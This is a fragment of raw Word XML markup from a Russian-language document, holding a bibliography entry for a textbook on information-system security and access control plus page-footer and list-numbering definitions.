        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="0"/>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Безопасность и управление доступом в информационных системах</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> : учеб. пособие / А.В. Васильков, И.А. Васильков. — М. : ФОРУМ : ИНФРА-М, 2017. — 368 с. — (Среднее профессиональное образование). - Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId306" w:history="1">
        <w:r w:rsidRPr="009B2EC0">
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://znanium.com/catalog/product/537054</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="002C1237">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B45DB0" w:rsidSect="00B45DB0">
      <w:footerReference w:type="default" r:id="rId307"/>
      <w:pgSz w:w="11900" w:h="16840"/>
      <w:pgMar w:top="1194" w:right="840" w:bottom="1440" w:left="1440" w:header="0" w:footer="0" w:gutter="0"/>
      <w:cols w:space="0" w:equalWidth="0">
        <w:col w:w="96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D0E" w:rsidRDefault="00D70D0E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D70D0E" w:rsidRDefault="00D7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DejaVu Sans">
    <w:altName w:val="Arial"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>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DB0" w:rsidRDefault="00B45DB0">
    <w:pPr>
      <w:pStyle w:val="af2"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="002C1237" w:rsidRPr="002C1237">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="ru-RU"/>
      </w:rPr>
      <w:t>279</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0">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D0E" w:rsidRDefault="00D70D0E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D70D0E" w:rsidRDefault="00D70D0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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000002"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B68079A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="В"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="В"/>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00000003"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E6AFB66"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="и"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="В"/>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0000004"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25E45D3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5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="519B500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6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="431BD7B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7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F2DBA3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8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C83E45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9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="257130A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A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62BBD95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B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="436C6124"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="с"/>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000000C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="628C895C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="В"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000000D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="333AB10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0000000E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="721DA31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0000000F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2443A858"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="\endash "/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="К"/>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00000010"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D1D5AE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00000011"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6763845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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000012"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75A2A8D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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000013"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08EDBDA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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000014"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="79838CB2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="К"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000015"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4353D0CC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="В"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000016"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B03E0C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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000017"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="189A769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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000018"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54E49EB4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="К"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000019"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71F32454"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="\endash "/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="В"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000001A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2CA88610"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="В"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000001B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0836C40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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="003761E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="577CBA98"/>
    <w:lvl w:ilvl="0" w:tplc="8A069490">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="36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0A152D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FD681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00B60212"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A5C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13045BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32F654D4"/>
    <w:lvl w:ilvl="0" w:tplc="224C2DD2">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1F54D99"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D34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28010A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A09AA3D0"/>
    <w:lvl w:ilvl="0" w:tplc="8A06949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3F6165E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="336C3934"/>
    <w:lvl w:ilvl="0" w:tplc="6F5C9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06797915"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B61A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68833F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82EE8826"/>
    <w:lvl w:ilvl="0" w:tplc="7E60BE30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8A069490">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol"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781189D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E2E059E6"/>
    <w:lvl w:ilvl="0" w:tplc="64C40916">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0834098A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="526" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="377AD33E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="872" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A2949A36">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1218" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="91E47762">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1564" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7E70F638">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1911" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7F6481E8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2257" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="23C0F07E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2603" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A7889780">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2949" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="37" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="086C3FEB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05A61858"/>
    <w:lvl w:ilvl="0" w:tplc="7F729CE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86F3CFA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC588758"/>
    <w:lvl w:ilvl="0" w:tplc="342CE6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08E904D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0A87CEC"/>
    <w:lvl w:ilvl="0" w:tplc="9550C1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0CCC31B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="314CBE24"/>
    <w:lvl w:ilvl="0" w:tplc="26A4C764">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="—"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="161" w:hanging="559"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:w w:val="102"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D2B2996A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="−"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="161" w:hanging="373"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:w w:val="102"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="06484748">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2337" w:hanging="373"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2B62CE88">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3425" w:hanging="373"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D88E7FB2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4514" w:hanging="373"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="42CA9E60">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5602" w:hanging="373"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6DB67FA4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6691" w:hanging="373"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4998C68E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7779" w:hanging="373"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="AA40DB18">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8868" w:hanging="373"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="41" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0D715244"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A8EF7A2"/>
    <w:lvl w:ilvl="0" w:tplc="BBCAD494">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D59441CA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="526" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="53F8C928">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="872" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="91E6C7E0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1218" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7ADE178C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1564" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AD02AD8C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1911" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="486E20C2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2257" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1F5A06FC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2603" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="62F2712A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2949" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="42" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0E3539B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1834DCA8"/>
    <w:lvl w:ilvl="0" w:tplc="ADC8630C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="120" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs/>
        <w:spacing w:val="-20"/>
        <w:w w:val="99"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CCDC9630">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1166" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="363E4A46">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2213" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F3720E5C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3260" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3CD28DAC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4307" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7C5C761A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5354" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2D3CA3AE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6401" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C686B7D2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7448" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="74F67AD2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8495" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="43" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0E977C3C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0084BE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06C256E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52A0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0E41DAC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1CDC8AE8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="8"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:legacy w:legacy="1" w:legacySpace="0" w:legacyIndent="230"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="46" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="10E96BFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E96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0F77DBF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7F4B75A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1463" w:hanging="388"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs/>
        <w:w w:val="102"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1617" w:hanging="543"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:spacing w:val="0"/>
        <w:w w:val="102"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2667" w:hanging="543"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3714" w:hanging="543"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4761" w:hanging="543"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5809" w:hanging="543"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6856" w:hanging="543"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
